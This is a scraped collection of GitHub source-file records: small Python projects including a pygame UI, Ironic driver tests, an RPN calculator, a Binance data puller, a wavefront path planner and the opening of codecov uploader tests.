self.textFields.values():\r\n i.clickDown()\r\n\r\n if event.type == pygame.MOUSEBUTTONUP:\r\n for b in self.buttons:\r\n if b.clickUp(): output.append(Events.ButtonClicked(b.index))\r\n\r\n for cb in self.checkBoxes.values():\r\n cb.clickUp()\r\n\r\n for s in self.sliders.values():\r\n s.clickUp()\r\n\r\n for tf in self.textFields.values():\r\n tf.clickUp()\r\n\r\n hoverMode = Events.NOHOVER\r\n\r\n for i in self.buttons + self.checkBoxes.values() + self.sliders.values():\r\n if i.updateHover(): hoverMode = Events.CLICKHOVER\r\n\r\n for i in self.textFields.values():\r\n if i.updateHover(): hoverMode = Events.TEXTHOVER\r\n\r\n output.append(Events.Hover(hoverMode))\r\n\r\n return output\r\n\r\n def draw(self, display, offset=(0, 0)):\r\n for b in self.buttons:\r\n pos = b.getDrawPos()\r\n pos[0] -= offset[0]\r\n pos[1] -= offset[1]\r\n\r\n display.blit(b.getIcon(), pos)\r\n\r\n for cb in self.checkBoxes.values():\r\n pos = cb.getDrawPos()\r\n pos[0] -= offset[0]\r\n pos[1] -= offset[1]\r\n\r\n display.blit(cb.getIcon(), pos)\r\n\r\n for s in self.sliders.values():\r\n pos = s.getDrawPos()\r\n pos[0] -= offset[0]\r\n pos[1] -= offset[1]\r\n\r\n display.blit(s.getIcon(), pos)\r\n\r\n for tf in self.textFields.values():\r\n pos = tf.getDrawPos()\r\n pos[0] -= offset[0]\r\n pos[1] -= offset[1]\r\n\r\n display.blit(tf.getIcon(), pos)\r\n","repo_name":"vctandrade/Backyard-Knight","sub_path":"graphics/userInterface/Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"8215306850","text":"from ironic.common import exception\nfrom ironic.common import states\nfrom ironic.drivers import base as driver_base\nfrom ironic.drivers import fake\nfrom ironic.tests import base\nfrom ironic.tests.db import utils as db_utils\n\n\nclass FakeDriverTestCase(base.TestCase):\n\n def setUp(self):\n super(FakeDriverTestCase, self).setUp()\n self.driver = fake.FakeDriver()\n self.node = db_utils.get_test_node()\n\n def test_driver_interfaces(self):\n # fake driver implements only 3 out of 5 interfaces\n self.assertIsInstance(self.driver.power, driver_base.PowerInterface)\n self.assertIsInstance(self.driver.deploy, driver_base.DeployInterface)\n self.assertIsInstance(self.driver.vendor, driver_base.VendorInterface)\n self.assertIsNone(self.driver.rescue)\n self.assertIsNone(self.driver.console)\n\n def test_power_interface(self):\n self.driver.power.validate(self.node)\n self.driver.power.get_power_state(None, self.node)\n self.driver.power.set_power_state(None, None, states.NOSTATE)\n self.driver.power.reboot(None, None)\n\n def test_deploy_interface(self):\n self.driver.deploy.validate(self.node)\n self.driver.deploy.deploy(None, None)\n self.driver.deploy.tear_down(None, None)\n\n def test_vendor_interface(self):\n info = {'method': 'foo',\n 'bar': 'baz'}\n self.assertTrue(self.driver.vendor.validate(self.node, **info))\n self.assertTrue(self.driver.vendor.vendor_passthru(None,\n self.node['uuid'], **info))\n # no method\n self.assertRaises(exception.InvalidParameterValue,\n self.driver.vendor.validate,\n self.node, bar='baz')\n","repo_name":"citrix-openstack-build/ironic","sub_path":"ironic/tests/drivers/test_fake.py","file_name":"test_fake.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"5"} +{"seq_id":"14456583162","text":"import sys\nimport operator\n\nOPS = {\n '+' : operator.add,\n '-' : 
operator.sub,\n    '*' : operator.mul,\n    '/' : operator.floordiv,\n}\n\nclass Stack:\n    def __init__(self) -> None:\n        self.items = []\n\n    def push(self, item) -> None:\n        self.items.append(int(item))\n\n    def pop(self) -> int:\n        return self.items.pop()\n    \n    def peek(self) -> int:\n        return self.items[-1]\n\n\ndef calc(item_1, oper, item_2) -> int:\n    return OPS[oper](item_1, item_2)\n\n\ndef main() -> None:\n    stack = Stack()\n    stroka = sys.stdin.readline().rstrip().split()\n    for i in stroka:\n        if i in OPS.keys():\n            item_2 = stack.pop() \n            item_1 = stack.pop()\n            res = calc(item_1, i, item_2)\n            stack.push(res)\n        else:\n            stack.push(i)\n    print(stack.peek())\n    \n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"MihaFedo/Algorithms_and_data_structures","sub_path":"sprint_12/final/f_12_2.py","file_name":"f_12_2.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"23939841724","text":"from .indicators_service import IndicatorsService\nfrom .banxico_parser import BanxicoParser\nfrom zeep import Client, Transport\n\nimport requests\n\n\nWSDL = 'http://www.banxico.org.mx/DgieWSWeb/DgieWS?wsdl'\n\n\nclass BanxicoService(IndicatorsService):\n    def __init__(self, logger):\n        self._logger = logger\n        self._parser = BanxicoParser()\n        try:\n            self._session = requests.Session()\n            self._client = Client(WSDL, transport=Transport(session=self._session))\n        except Exception as ex:\n            self._session = None\n            self._client = None\n            self._logger.error(ex)\n\n    def __enter__(self):\n        return self\n\n    def get_exchange_rates(self):\n        assert self._session and self._client, 'Banxico communication failed'\n\n        response = self._client.service.tiposDeCambioBanxico()\n        return self._parser.parse(response)\n\n    def close(self):\n        if(self._session):\n            self._session.close()\n\n    def __exit__(self, exc_type, exc_value, traceback):\n        self.close()\n","repo_name":"xxlxii/kelvin","sub_path":"kelvin/siblings/data/banxico_service.py","file_name":"banxico_service.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38348339927","text":"def falling(n, k):\n    \"\"\"Compute the falling factorial of n to depth k.\n\n    >>> falling(6, 3)  # 6 * 5 * 4\n    120\n    >>> falling(4, 3)  # 4 * 3 * 2\n    24\n    >>> falling(4, 1)  # 4\n    4\n    >>> falling(4, 0)\n    1\n    \"\"\"\n    \"*** YOUR CODE HERE ***\"\n    result, curr, i = 1, n, 0\n    while i < k:\n        curr = n - i\n        result = result * curr\n        i += 1\n    return result\n\n\n\ndef sum_digits(y):\n    \"\"\"Sum all the digits of y.\n\n    >>> sum_digits(10) # 1 + 0 = 1\n    1\n    >>> sum_digits(4224) # 4 + 2 + 2 + 4 = 12\n    12\n    >>> sum_digits(1234567890)\n    45\n    >>> a = sum_digits(123) # make sure that you are using return rather than print\n    >>> a\n    6\n    \"\"\"\n    \"*** YOUR CODE HERE ***\"\n    next, curr, sum = y, 0, 0\n    while next > 0:\n        curr = next % 10\n        sum += curr\n        next = next // 10\n    return sum\n\n\n\ndef double_eights(n):\n    \"\"\"Return true if n has two eights in a row.\n    >>> double_eights(8)\n    False\n    >>> double_eights(88)\n    True\n    >>> double_eights(2882)\n    True\n    >>> double_eights(880088)\n    True\n    >>> double_eights(12345)\n    False\n    >>> double_eights(80808080)\n    False\n    \"\"\"\n    \"*** YOUR CODE HERE ***\"\n    next, curr, last = n, 0, 0\n    while next > 0:\n        curr = next % 10\n        if curr == 8 and curr == last:\n            return True\n        next = next // 10\n        last = curr\n    return False 
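\n\n# added note (not in the original): for the non-negative inputs in the doctests,\n# double_eights(n) is equivalent to the string-based check '88' in str(n)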
\n\n","repo_name":"hello2333/cs-course","sub_path":"cs61a/lab/lab01/lab01.py","file_name":"lab01.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36622021574","text":"from django.conf.urls.defaults import *\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n (r'^admin/doc/', include('django.contrib.admindocs.urls')),\n (r'^admin/', include(admin.site.urls)),\n (r'^accounts/login/$', 'django.contrib.auth.views.login'),\n (r'^api/', include('findcontext.api.urls')),\n (r'^', include('findcontext.main.urls')),\n)\n","repo_name":"rybesh/findcontext","sub_path":"findcontext/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"1028232287","text":"\"\"\"\nPython Audio Player\n\nLibraries:\n - pyGame\n - TKInter\n\nRelevant Documentation:\n - pyGame Mixer Documentation (https://www.pygame.org/docs/ref/mixer.html)\n\n\"\"\"\n\n\"\"\"Import Modules\"\"\"\n\n\"\"\"Create Window\"\"\"\n\nimport pygame\nimport tkinter as tkr\nimport os\nplayer = tkr.Tk()\n\n\"\"\"Edit Window\"\"\"\nplayer.title(\"Audio Player\")\nplayer.geometry(\"400x540\")\n\n\n\"\"\"Playlist Register\"\"\"\nos.chdir(\"Portfolio/Music Player/album\")\nprint(os.getcwd())\nsonglist = os.listdir()\n\n\n\"\"\"Create Playlist\"\"\"\nplaylist = tkr.Listbox(player, highlightcolor=\"blue\", selectmode=tkr.SINGLE)\nprint(songlist)\nfor item in songlist:\n pos = 0\n playlist.insert(pos, item)\n pos = pos + 1\n\n\n\"\"\"Get Song\"\"\"\n#file = \"Portfolio/Music Player/Song.mp3\"\n\n\"\"\" Pygame init\"\"\"\npygame.init()\npygame.mixer.init()\n\n\n\"\"\"Action Event\"\"\"\n\n\ndef Play():\n pygame.mixer.music.load(playlist.get(tkr.ACTIVE))\n var.set(playlist.get(tkr.ACTIVE))\n pygame.mixer.music.play()\n pygame.mixer.music.set_volume(volumeLevel.get())\n print(pygame.mixer.music.get_volume())\n print(volumeLevel.get())\n\n\ndef ExitPlayer():\n pygame.mixer.music.stop()\n\n\ndef Pause():\n pygame.mixer.music.pause()\n\n\ndef UnPause():\n pygame.mixer.music.unpause()\n\n\ndef ChangeVolume(newVolume):\n pygame.mixer.music.set_volume(float(newVolume))\n\n\n\"\"\"Register Buttoms\"\"\"\nbutton1 = tkr.Button(player, width=5, height=3, text=\"PLAY\", command=Play)\nbutton2 = tkr.Button(player, width=5, height=3,\n text=\"STOP\", command=ExitPlayer)\nbutton3 = tkr.Button(player, width=5, height=3, text=\"PAUSE\", command=Pause)\nbutton4 = tkr.Button(player, width=5, height=3, text=\"UNPAUSE\", command=Pause)\n\n\n\"\"\"Song Name\"\"\"\n#contents1 = tkr.Label(player, text=file)\nvar = tkr.StringVar()\nsongtitle = tkr.Label(player, textvariable=var)\n\n\n\"\"\"Volume Input\"\"\"\nvolumeLevel = tkr.Scale(player, from_=0.0, to_=1.0,\n orient=tkr.HORIZONTAL, resolution=0.01, command=ChangeVolume)\n\n\"\"\"Place Widgets\"\"\"\nsongtitle.pack()\nbutton1.pack(fill=\"x\")\nbutton2.pack(fill=\"x\")\nbutton3.pack(fill=\"x\")\nbutton4.pack(fill=\"x\")\nvolumeLevel.pack(fill=\"x\")\nplaylist.pack(fill=\"both\", expand=\"yes\")\n\n\"\"\"Activate\"\"\"\nplayer.mainloop()\n","repo_name":"brettAI/The_Python_Learning_Experience","sub_path":"Portfolio/Music Player/pythonaudioplayer.py","file_name":"pythonaudioplayer.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29638431968","text":"from collections 
import deque\n\n\nn,m = map(int,input().split())\nmaze = [[] for _ in range(n)]\n\nfor i in range(n):\n    s = input()\n    for char in s:\n        maze[i].append(int(char))\n\ndef bfs(maze):\n    # bfs() was called below but never defined in the original file; a standard\n    # BOJ 2178 shortest-path BFS is assumed here. Distances are written into the\n    # maze in place, with maze[0][0] == 1 counting as the first step.\n    queue = deque([(0, 0)])\n    while queue:\n        x, y = queue.popleft()\n        for dx, dy in ((1, 0), (-1, 0), (0, 1), (0, -1)):\n            nx, ny = x + dx, y + dy\n            if 0 <= nx < n and 0 <= ny < m and maze[nx][ny] == 1:\n                maze[nx][ny] = maze[x][y] + 1\n                queue.append((nx, ny))\n    return maze[n - 1][m - 1]\n\nprint(bfs(maze))\n","repo_name":"hongcheol/python_coding_test","sub_path":"2178.py","file_name":"2178.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18370694472","text":"import pandas as pd\nfrom ClientInfo import client\n\n\ndefault_market_data_indices = {0: 'time', 1: 'open', 2: 'high', 3: 'low', 4: 'close', 5: 'volume'}\n\nprint('Gathering ', default_market_data_indices.values())\n\ndef pull_market_data(input_dict):\n    print('Pulling Market Data...')\n    pulled_data = {}\n\n    for current_symbol in input_dict['symbol_list']:\n        current_klines_df = pd.DataFrame(client.get_historical_klines(current_symbol,\n                                                                     input_dict['interval'],\n                                                                     input_dict['start_str'],\n                                                                     input_dict['end_str']))\n\n        pulled_data[current_symbol] = create_subset_of_and_rename_kline_df(current_klines_df)\n        print(current_symbol, ' Pulled')\n\n    return pulled_data\n\n\ndef create_subset_of_and_rename_kline_df(current_klines_df):\n\n    data_to_be_pulled_from_klines = default_market_data_indices.keys()\n\n    current_asset_data = pd.DataFrame(current_klines_df[data_to_be_pulled_from_klines].rename\n                                      (columns=default_market_data_indices))\n\n    current_asset_data = format_time_and_set_cast_as_float(current_asset_data)\n\n    return current_asset_data\n\n\ndef format_time_and_set_cast_as_float(data_df):\n    data_df = data_df.astype('float64')\n    data_df['time'] = pd.to_datetime(data_df['time']/1000, unit='s')\n    return data_df\n#demo code\nif __name__ == '__main__':\n\n    input_dict = {'symbol_list': ['BTCUSDT'],\n                  'interval': '4h',\n                  'start_str':'30 days ago',\n                  'end_str':'1-25-2021'\n                  }\n    print('Sample Code')\n    print('Getting input for:\\n', input_dict)\n\n    BTCUSDT_market_data = pull_market_data(input_dict)['BTCUSDT']\n    print(BTCUSDT_market_data.head())\n\n\n    input_dict = {'symbol_list': ['BTCUSDT', 'ETHBTC'],\n                  'interval': '4h',\n                  'start_str': '12-25-2020',\n                  'end_str': '1-25-2021'\n                  }\n    print('Getting input for:\\n', input_dict)\n\n    market_data = pull_market_data(input_dict)\n    for symbol in market_data:\n        print('\\n', symbol, '\\n', market_data[symbol].head())\n\n","repo_name":"cregs08/PullMarketDataBinance","sub_path":"PullMarketDataInputDict/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35492783783","text":"from __future__ import annotations\n\nimport math\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\n\nimport time\n\nfrom typing import Coroutine, Tuple\nfrom typing import List\n\nshow_animation = True\n\nif show_animation:\n    ax = plt.axes()\n\nclass Edge:\n    def __init__(self, parent : Sphere, child : Sphere) -> None:\n        self.parent = parent\n        self.child = child\n\nclass Node:\n    def __init__(self, x : float, y : float) -> None:\n        self.x = x\n        self.y = y\n\n    def __str__(self) -> str:\n        return str(self.x) + \", \" + str(self.y)\n\nclass Coordinate:\n    def __init__(self, x : float, y : float) -> None:\n        self.x = x\n        self.y = y\n\nclass Sphere:\n    def __init__(self, center: Coordinate, radius : float, parent: Sphere) -> None:\n        self.center = center\n        self.radius = radius\n        self.parent = parent\n\nclass PrioritySphereQueueNode:\n    def __init__(self, sphere: Sphere, priority: float) -> 
None:\n        self.sphere = sphere\n        self.priority = priority\n\ndef searchNearestFromList(sample_x : float, sample_y : float, ox : list[float], oy : list[float]) -> Tuple[int, float] :\n    min_index = 0\n    min_dist = np.hypot(ox[0] - sample_x, oy[0] - sample_y)\n    for i in range(len(ox)):\n        dist = np.hypot(ox[i] - sample_x, oy[i] - sample_y)\n        if (dist < min_dist):\n            min_dist = dist\n            min_index = i\n\n    return min_index, min_dist\n\ndef calcEuclidDistance(p1: Coordinate, p2: Coordinate) -> float:\n    return math.sqrt((p1.x-p2.x)**2.0 + (p1.y-p2.y)**2.0)\n\nclass CollisionChecker(object):\n    \"\"\"\n    Collision checker for path planning\n    \"\"\"\n    def __init__(self, ox : list[float], oy :list[float], rr : float) -> None:\n        \"\"\"\n        ox : The list for x of obstacles\n        oy : The list for y of obstacles\n        rr : The threshold used to decide collision with obstacles\n        \"\"\"\n        self.ox = ox\n        self.oy = oy\n        self.rr = rr\n        self.max_x : float = max(ox)\n        self.min_x : float = min(ox)\n        self.max_y : float = max(oy)\n        self.min_y : float = min(oy)\n\n    def isCollision(self, p : Coordinate) -> bool:\n        \"\"\"\n        If any obstacle (ox, oy) lies within radius rr, return True (colliding)\n        \"\"\"\n        _, min_dist = searchNearestFromList(p.x, p.y, self.ox, self.oy)\n        if min_dist < self.rr: \n            return True  # collide\n        else:\n            return False  # no collide\n\n    def isCollisionPath(self, p0 : Coordinate, p1 : Coordinate) -> bool:\n        \"\"\"\n        p0, p1 : the vertexes which comprise a line\n        Check collision between the line and ox, oy by rr.\n        If there is collision, return True.\n        \"\"\"\n        dx = p1.x - p0.x\n        dy = p1.y - p0.y\n        yaw = math.atan2(dy, dx)\n        d = np.hypot(dx, dy)\n\n        D = self.rr\n        n_step = round(d / D)\n\n        x = p0.x\n        y = p0.y\n\n        for i in range(n_step):\n            _, dist = searchNearestFromList(x, y, self.ox, self.oy)\n            if dist <= self.rr:\n                return True  # collide\n            x += D * math.cos(yaw)\n            y += D * math.sin(yaw)\n        \n        return False  # no collide \n\n    def getNearestDistance(self, pos: Coordinate) -> float:\n        max_distance = 1000000.0  # should be max...\n        for x, y in zip(self.ox, self.oy):\n            dist = calcEuclidDistance(Coordinate(x,y), pos)\n            if (dist < max_distance):\n                max_distance = dist\n        return max_distance\n\ndef get_the_most_lower_priority_index(queue : List[PrioritySphereQueueNode]) -> int:\n    index = 0\n    prio = queue[0].priority\n    for idx, node in enumerate(queue):\n        if node.priority < prio:\n            prio = node.priority  # track the running minimum (the original never updated it)\n            index = idx\n    return index\n\nclass WaveFront(object):\n\n    def __init__(self, collision_checker : CollisionChecker) -> None:\n        self.vertexes : List[Sphere] = []\n        self.edges : List[Edge] = []\n        self.sphere_que : List[PrioritySphereQueueNode] = []\n        self.collision_checker = collision_checker\n\n    def search(self, start : Coordinate, goal : Coordinate, n: int) -> None:\n        radius = self.collision_checker.getNearestDistance(start)\n        sphere_node = Sphere(start, radius, None)\n        self.sphere_que.append(PrioritySphereQueueNode(sphere_node, calcEuclidDistance(goal, start) - radius))\n\n        while True:\n            # Get the sphere closest to the goal\n            self.sphere_que.sort(key=lambda x: x.priority, reverse=True)  # sort in descending order\n            #sphere_node = self.sphere_que.pop()  # pop the last item of the sorted list and remove it. Original method\n            sphere_node = self.sphere_que[-1]  # get the last item but do not remove it. My method.\n            self.vertexes.append(sphere_node.sphere)\n            self.edges.append(Edge(sphere_node.sphere.parent, sphere_node.sphere))\n\n            # Check whether the sphere reaches the goal.\n            if (calcEuclidDistance(goal, sphere_node.sphere.center) < sphere_node.sphere.radius):\n                self.edges.append(Edge(sphere_node.sphere, Sphere(goal, 0, sphere_node.sphere)))\n                return #Tree(V, E)\n\n            # Sample n points on the sphere surface\n            added_counter = 0\n            for i in range(n):\n                theta = random.random() * 2.0 * math.pi\n                qnew = Coordinate(sphere_node.sphere.center.x + sphere_node.sphere.radius * math.cos(theta),\n                                  sphere_node.sphere.center.y + sphere_node.sphere.radius * math.sin(theta))\n                is_outside = True\n                # Check the sphere is not inside other spheres\n                for existing_sphere in self.vertexes:\n                    if existing_sphere is sphere_node.sphere:  # compare Sphere to Sphere (the original compared against the queue node)\n                        continue\n                    if calcEuclidDistance(qnew, existing_sphere.center) < existing_sphere.radius:\n                        is_outside = False\n                        break\n                if not is_outside:\n                    continue\n                new_radius = self.collision_checker.getNearestDistance(qnew)\n                if (new_radius < 2.0):  # Reject spheres that are too small\n                    continue\n                new_sphere = Sphere(qnew, new_radius, sphere_node.sphere)\n                self.sphere_que.append(PrioritySphereQueueNode(new_sphere, calcEuclidDistance(goal, qnew) - new_radius))\n                added_counter += 1\n            \n            # My method: if no sample could be added for this sphere, lower its priority so another sphere is selected in the next loop.\n            if (added_counter == 0):\n                self.sphere_que[-1].priority += self.sphere_que[-1].sphere.radius #add penalty\n\n            if (len(self.sphere_que) == 0):\n                print(\"sphere_que length is zero!\")\n                break\n\n        return\n\n
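    # --- added note (not part of the original) ---\n    # sphere_que is fully re-sorted on every loop iteration, which costs O(n log n)\n    # per expansion; the same \"closest sphere first\" order could come from heapq,\n    # e.g. heapq.heappush(que, (priority, count, node)) with que[0] to peek.\n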
    def plot(self) -> None:\n        for sphere in self.vertexes:\n            c = patches.Circle(xy=(sphere.center.x, sphere.center.y), radius=sphere.radius, fc='g', ec='r', fill=False)\n            ax.add_patch(c)\n        for edge in self.edges:\n            if edge.parent is not None and edge.child is not None:\n                plt.plot([edge.parent.center.x, edge.child.center.x], [edge.parent.center.y, edge.child.center.y], 'b')\n\n\ndef main():\n    #random.seed(1)\n    print(\"{} start !\".format(__file__))\n\n    sx = 10.0\n    sy = 10.0\n    gx = 50.0\n    gy = 50.0\n    robot_size = 5.0\n\n    ox = []\n    oy = []\n\n    for i in range(60):\n        ox.append(i)\n        oy.append(0.0)\n    for i in range(60):\n        ox.append(60.0)\n        oy.append(i)\n    for i in range(61):\n        ox.append(i)\n        oy.append(60.0)\n    for i in range(61):\n        ox.append(0.0)\n        oy.append(i)\n    for i in range(40):\n        ox.append(20.0)\n        oy.append(i)\n    for i in range(40):\n        ox.append(40)\n        oy.append(60.0 - i)\n\n    if show_animation:\n        plt.plot(ox, oy, \".k\")\n        plt.plot(sx, sy, \"^r\")\n        plt.plot(gx, gy, \"^c\")\n        plt.grid(True)\n        plt.axis(\"equal\")\n\n    collision_checker = CollisionChecker(ox, oy, 2.0)\n    wave_front_explorer = WaveFront(collision_checker)\n\n    start = Coordinate(sx, sy)\n    goal = Coordinate(gx, gy)\n    start_time = time.perf_counter_ns()\n    wave_front_explorer.search(start, goal, 3)\n    elapsed = time.perf_counter_ns() - start_time\n    print(\"elapsed time: {0} ms\".format(elapsed*1e-6))\n    wave_front_explorer.plot()\n\n    if show_animation:\n        #plt.plot(rx, ry, \"-r\")\n        plt.pause(0.001)\n        plt.show()\n\nif __name__ == '__main__':\n    main()\n","repo_name":"AriYu/myWavefront","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8616,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"39648882393","text":"import copy\n\nfrom graphics.plotly_plot import (\n    PlotlyPlot,\n    LAYOUT,\n    TITLE,\n    PLOT_AXIS,\n    VISUALIZATION_TYPE,\n    AGGREGATIONS,\n    OPTIONS,\n    
AGGREGATE,\n TRANSFORMS,\n)\nimport pytest\nimport json\nimport pandas as pd\n\nfrom utility.constants import POINTS_NUM, DATA, OPTION_COL\n\nTITLE1 = \"random_num\"\nTITLE2 = \"another_rand\"\n\n\n@pytest.fixture()\ndef make_data():\n data = {\n TITLE1: [3, 6, 7],\n TITLE2: [4, 8, 1],\n }\n\n return pd.DataFrame(data)\n\n\ndef test_plotly_draw_scatter(make_data):\n plot_options = {\n DATA: [{\"type\": \"scatter\", \"x\": TITLE1, \"y\": TITLE2, \"mode\": \"markers\"}]\n }\n\n ploty_test = PlotlyPlot()\n graph_json = ploty_test.make_dict_for_html_plot(make_data, plot_options)\n graph_dict = json.loads(graph_json)\n\n assert (graph_dict[DATA][0][\"x\"] == make_data[TITLE1]).all()\n assert (graph_dict[DATA][0][\"y\"] == make_data[TITLE2]).all()\n assert graph_dict[LAYOUT][PLOT_AXIS.format(\"x\")][TITLE] == TITLE1\n assert graph_dict[LAYOUT][PLOT_AXIS.format(\"y\")][TITLE] == TITLE2\n # assert graph_dict[LAYOUT][PLOT_AXIS.format(\"x\")][AUTOMARGIN]\n # assert graph_dict[LAYOUT][PLOT_AXIS.format(\"y\")][AUTOMARGIN]\n assert len(graph_dict[DATA][0][TRANSFORMS]) == 0\n\n\ndef test_plotly_visualization_options(make_data, test_app_client_csv_backed):\n plot_options = {\n DATA: [{\"type\": \"scatter\", \"x\": TITLE1, \"y\": TITLE2, \"mode\": \"markers\"}]\n }\n ploty_test = PlotlyPlot()\n visualization_options = {\n \"hover_data\": {OPTION_COL: [TITLE1],}, # need a flask app to run\n AGGREGATE: {OPTION_COL: [TITLE2], AGGREGATIONS: {\"x\": \"avg\", \"y\": \"avg\"},},\n }\n\n graph_json = ploty_test.make_dict_for_html_plot(\n make_data, plot_options, visualization_options\n )\n graph_dict = json.loads(graph_json)\n transform_dict = graph_dict[DATA][0][TRANSFORMS]\n assert len(transform_dict) == 1\n\n assert transform_dict[0][VISUALIZATION_TYPE] == AGGREGATE\n assert transform_dict[0][AGGREGATIONS][0][\"target\"] == \"x\"\n assert transform_dict[0][AGGREGATIONS][0][\"func\"] == \"avg\"\n assert transform_dict[0][AGGREGATIONS][1][\"target\"] == \"y\"\n assert transform_dict[0][AGGREGATIONS][1][\"func\"] == \"avg\"\n","repo_name":"twosixlabs/escalation_demo","sub_path":"escalation/tests/test_plotly.py","file_name":"test_plotly.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39902646044","text":"import os\nimport sys\nimport pickle\nimport itertools\nimport zlib\nfrom ddt import ddt, data\nfrom mock import patch, Mock\nimport unittest\n\nimport subprocess\n\nimport codecov\n\n\n@ddt\nclass TestUploader(unittest.TestCase):\n maxDiff = None\n here = os.path.dirname(__file__)\n bowerrc = os.path.join(os.path.dirname(__file__), \"../.bowerrc\")\n token = os.path.join(os.path.dirname(__file__), \"../.token\")\n jacoco = os.path.join(os.path.dirname(__file__), \"../jacoco.xml\")\n filepath = os.path.join(os.path.dirname(__file__), \"coverage.xml\")\n coverage = os.path.join(os.path.dirname(__file__), \"../.coverage\")\n defaults = dict(commit=\"a\", branch=\"a\", token=\"a\")\n\n @classmethod\n def setUpClass(self):\n self._env = os.environ.copy()\n\n @classmethod\n def tearDownClass(self):\n os.environ = self._env\n\n def setUp(self):\n # set all environ back\n os.environ[\"CI\"] = \"true\"\n for key in (\n \"TRAVIS\",\n \"TRAVIS_BRANCH\",\n \"TRAVIS_COMMIT\",\n \"TRAVIS_BUILD_DIR\",\n \"TRAVIS_JOB_ID\",\n \"TRAVIS_PULL_REQUEST\",\n \"CI_NAME\",\n \"CI_BRANCH\",\n \"CI_COMMIT_ID\",\n \"SHIPPABLE\",\n \"CI_BUILD_NUMBER\",\n \"MAGNUM\",\n \"CI_COMMIT\",\n \"APPVEYOR_ACCOUNT_NAME\",\n 
\"APPVEYOR_PROJECT_SLUG\",\n \"APPVEYOR_PULL_REQUEST_NUMBER\",\n \"CIRCLECI\",\n \"CIRCLE_BRANCH\",\n \"CIRCLE_ARTIFACTS\",\n \"CIRCLE_SHA1\",\n \"CIRCLE_NODE_INDEX\",\n \"CIRCLE_PR_NUMBER\",\n \"SEMAPHORE\",\n \"BRANCH_NAME\",\n \"SEMAPHORE_PROJECT_DIR\",\n \"REVISION\",\n \"BUILDKITE\",\n \"BUILDKITE_BUILD_NUMBER\",\n \"BUILDKITE_JOB_ID\",\n \"BUILDKITE_BRANCH\",\n \"BUILDKITE_PROJECT_SLUG\",\n \"BUILDKITE_COMMIT\",\n \"DRONE\",\n \"DRONE_BRANCH\",\n \"DRONE_BUILD_DIR\",\n \"JENKINS_URL\",\n \"TRAVIS_TAG\",\n \"GIT_BRANCH\",\n \"GIT_COMMIT\",\n \"WORKSPACE\",\n \"BUILD_NUMBER\",\n \"CI_BUILD_URL\",\n \"SEMAPHORE_REPO_SLUG\",\n \"SEMAPHORE_CURRENT_THREAD\",\n \"DRONE_BUILD_LINK\",\n \"TRAVIS_REPO_SLUG\",\n \"CODECOV_TOKEN\",\n \"CODECOV_NAME\",\n \"APPVEYOR\",\n \"APPVEYOR_REPO_BRANCH\",\n \"APPVEYOR_BUILD_VERSION\",\n \"APPVEYOR_JOB_ID\",\n \"APPVEYOR_REPO_NAME\",\n \"APPVEYOR_REPO_COMMIT\",\n \"WERCKER_GIT_BRANCH\",\n \"WERCKER_MAIN_PIPELINE_STARTED\",\n \"WERCKER_GIT_OWNER\",\n \"WERCKER_GIT_REPOSITORY\",\n \"CI_BUILD_REF_NAME\",\n \"CI_BUILD_ID\",\n \"CI_BUILD_REPO\",\n \"CI_PROJECT_DIR\",\n \"CI_BUILD_REF\",\n \"CI_SERVER_NAME\",\n \"CI_COMMIT_REF_NAME\",\n \"CI_JOB_ID\",\n \"CI_REPOSITORY_URL\",\n \"CI_COMMIT_SHA\",\n \"ghprbActualCommit\",\n \"ghprbSourceBranch\",\n \"ghprbPullId\",\n \"WERCKER_GIT_COMMIT\",\n \"CHANGE_ID\",\n ):\n os.environ[key] = \"\"\n\n def tearDown(self):\n self.delete(self.filepath, self.coverage, self.jacoco, self.bowerrc)\n self.delete(\"hello\", \"hello.c\", \"hello.gcda\", \"hello.c.gcov\", \"hello.gcno\")\n\n def set_env(self, **kwargs):\n for key in kwargs:\n os.environ[key] = str(kwargs[key])\n\n def run_cli(self, dump=True, *args, **kwargs):\n inline = list(\n itertools.chain(\n *[[\"--%s\" % key, str(value)] for key, value in kwargs.items() if value]\n )\n )\n if dump:\n inline.append(\"--dump\")\n inline.extend(args)\n return codecov.main(*inline, debug=True)\n\n def fake_report(self):\n with open(self.filepath, \"w+\") as f:\n f.write(\"__data__\")\n\n def delete(self, *paths):\n for path in paths:\n if os.path.exists(path):\n os.remove(path)\n path = os.path.join(os.path.dirname(__file__), \"../\", path)\n if os.path.exists(path):\n os.remove(path)\n\n @data(\n \"vendor\",\n \"node_modules\",\n \"js/generated/coverage\",\n \"__pycache__\",\n \"coverage/instrumented\",\n \"build/lib\",\n \"htmlcov\",\n \".egg-info\",\n \".git\",\n \".tox\",\n \"venv\",\n \".venv-python-2.7\",\n )\n def test_ignored_path(self, path):\n self.assertTrue(\n 